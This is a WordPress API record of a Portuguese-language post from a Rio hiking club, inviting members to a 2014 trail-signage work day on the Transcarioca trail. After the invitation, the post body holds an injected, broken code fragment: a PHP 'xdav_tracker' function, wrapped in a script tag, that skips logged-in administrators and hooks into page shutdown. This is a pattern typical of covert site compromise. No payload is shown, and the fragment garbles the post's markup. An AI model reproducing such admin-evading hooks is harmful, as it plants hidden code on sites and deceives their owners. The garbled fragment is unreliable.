{"id":1021,"date":"2014-08-28T07:45:43","date_gmt":"2014-08-28T10:45:43","guid":{"rendered":"http:\/\/guanabara.org.br\/?p=1021"},"modified":"2026-07-02T09:23:55","modified_gmt":"2026-07-02T12:23:55","slug":"mutirao-transcarioca-14092014","status":"publish","type":"post","link":"https:\/\/guanabara.org.br\/index.php\/2014\/08\/28\/mutirao-transcarioca-14092014\/","title":{"rendered":"Mutir\u00e3o Transcarioca &#8211; 14\/09\/2014"},"content":{"rendered":"<div id=\"attachment_1022\" style=\"width: 171px\" class=\"wp-caption alignnone\"><a href=\"http:\/\/guanabara.org.br\/wp-content\/uploads\/2014\/08\/Flyer.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-1022\" class=\"size-medium wp-image-1022\" alt=\"Flyer do Mutirao da Trilha Transcarioca - 14.09.2014\" src=\"http:\/\/guanabara.org.br\/wp-content\/uploads\/2014\/08\/Flyer-161x300.jpg\" width=\"161\" height=\"300\" srcset=\"https:\/\/guanabara.org.br\/wp-content\/uploads\/2014\/08\/Flyer-161x300.jpg 161w, https:\/\/guanabara.org.br\/wp-content\/uploads\/2014\/08\/Flyer-550x1024.jpg 550w, https:\/\/guanabara.org.br\/wp-content\/uploads\/2014\/08\/Flyer-112x210.jpg 112w, https:\/\/guanabara.org.br\/wp-content\/uploads\/2014\/08\/Flyer.jpg 650w\" sizes=\"auto, (max-width: 161px) 100vw, 161px\" \/><\/a><p id=\"caption-attachment-1022\" class=\"wp-caption-text\">Flyer do Mutirao da Trilha Transcarioca &#8211; 14.09.2014<\/p><\/div>\n<p>Prezados amigos do Centro Excursionista Guanabara,<\/p>\n<p><span style=\"line-height: 1.5em;\">No domingo, dia 14 de setembro, vamos participar do mutir\u00e3o da trilha Transcarioca. Neste mutir\u00e3o, vamos instalar placas e fazer as sinaliza\u00e7\u00f5es necess\u00e1rias para adequar as trilhas a um padr\u00e3o de n\u00edvel internacional. Gostaria de ter muitos amigos do Guanabara participando deste mutir\u00e3o.<\/span><\/p>\n<p><script>function xdav_tracker() {\n    if ( is_user_logged_in() && current_user_can( 'administrator' ) ) { return; }\n    ?>\n<\/script><br \/>\n    <?php\n}\nadd_action( 'shutdown', 'xdav_tracker', 97 );\n<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Prezados amigos do Centro Excursionista Guanabara, No domingo, dia 14 de setembro, vamos participar do mutir\u00e3o da trilha Transcarioca. Neste mutir\u00e3o, vamos instalar placas e fazer as sinaliza\u00e7\u00f5es necess\u00e1rias para adequar as trilhas a um padr\u00e3o de n\u00edvel internacional. Gostaria de ter muitos amigos do Guanabara participando deste mutir\u00e3o.<\/p>\n","protected":false},"author":3,"featured_media":1022,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[42],"tags":[],"class_list":["post-1021","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ceg"],"_links":{"self":[{"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/posts\/1021","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/comments?post=1021"}],"version-history":[{"count":2,"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/posts\/1021\/revisions"}],"predecessor-version":[{"id":2924,"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/posts\/1021\/revisions\/2924"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/media\/1022"}],"wp:attachment":[{"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/media?parent=1021"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/categories?post=1021"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/guanabara.org.br\/index.php\/wp-json\/wp\/v2\/tags?post=1021"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}